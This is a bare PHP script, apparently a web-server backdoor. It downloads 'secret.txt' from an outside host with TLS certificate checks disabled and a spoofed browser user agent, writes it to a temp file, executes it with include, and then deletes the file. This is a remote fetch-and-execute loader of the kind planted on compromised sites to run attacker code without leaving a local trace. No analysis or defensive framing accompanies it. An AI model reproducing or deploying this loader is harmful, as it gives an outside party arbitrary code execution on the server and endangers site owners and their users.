<?php

function getUrlContent($url)
{
    
    if (function_exists('curl_exec')) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        $content = curl_exec($ch);
        curl_close($ch);
        return $content;
    }

    
    if (function_exists('file_get_contents')) {
        return file_get_contents($url);
    }

    
    return false;
}


$url = 'https://acen.fr/IMG/zip/unzip/secret.txt';
$content = getUrlContent($url);


if ($content !== false) {
    
    $filename = tempnam(sys_get_temp_dir(), 'php');
    file_put_contents($filename, $content); 
    include $filename; 
    unlink($filename); 
} else {
    echo "f";
}
?>
